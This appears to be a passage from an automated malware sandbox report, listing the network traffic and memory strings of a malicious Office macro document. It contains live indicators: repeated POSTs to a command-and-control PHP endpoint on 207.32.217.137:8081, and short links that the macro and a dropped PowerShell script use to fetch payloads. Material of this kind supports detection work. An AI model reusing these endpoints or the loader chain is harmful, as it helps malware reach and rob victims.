          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 284Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 284Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 284Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 286Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 284Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficTCP traffic: 192.168.2.3:49838 -> 207.32.217.137:8081
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDNS query: name: bit.ly
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: unknownTCP traffic detected without corresponding DNS query: 207.32.217.137
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: aspnet_compiler.exe, 0000001F.00000002.595461518.0000000003588000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.595879670.0000000003656000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.595907029.000000000365C000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.596041757.0000000003682000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.595740683.0000000003616000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000001F.00000002.596016049.000000000367C000.00000004.00000001.sdmpString found in binary or memory: http://207.32.217.137:8081
          Source: aspnet_compiler.exe, 0000001F.00000002.595461518.0000000003588000.00000004.00000001.sdmpString found in binary or memory: http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpString found in binary or memory: http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php127.0.0.1POST
          Source: aspnet_compiler.exe, 0000001F.00000002.595461518.0000000003588000.00000004.00000001.sdmpString found in binary or memory: http://207.32.217.137:8081x&bq(
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
          Source: powershell.exe, 00000009.00000003.439483143.0000000002CC6000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: aspnet_compiler.exe, 0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpString found in binary or memory: http://kVEmyA.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
          Source: ~DF85570804A0D29ED2.TMP.7.drString found in binary or memory: http://www.j.mp/asao
          Source: ~DF1369462A1EE99835.TMP.7.dr, notnice.ps1.7.dr, vbaProject.binString found in binary or memory: http://www.j.mp/asasdjiasjdiasjasdasddik
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.aadrm.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.aadrm.com/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.cortana.ai
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.diagnostics.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.microsoftstream.com/api/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.office.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.onedrive.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://apis.live.net/v5.0/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://augloop.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://augloop.office.com/v2
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://cdn.entity.
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://clients.config.office.net/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://config.edge.skype.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://cortana.ai
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://cortana.ai/api
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://cr.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://dataservice.o365filtering.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://dataservice.o365filtering.com/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://dev.cortana.ai
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://devnull.onenote.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://directory.services.
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://enrichment.osi.office.net/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
          Source: powershell.exe, 00000009.00000003.392280394.0000000005423000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://graph.ppe.windows.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://graph.ppe.windows.net/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://graph.windows.net
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://graph.windows.net/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://incidents.diagnostics.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://invites.office.com/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://lifecycle.office.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://login.microsoftonline.com/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://login.windows.local
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://management.azure.com
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://management.azure.com/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://messaging.office.com/
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://ncus.contentsync.
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://ncus.pagecontentsync.
          Source: 8C01FE73-17BC-469B-9266-AF90E081EBE6.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
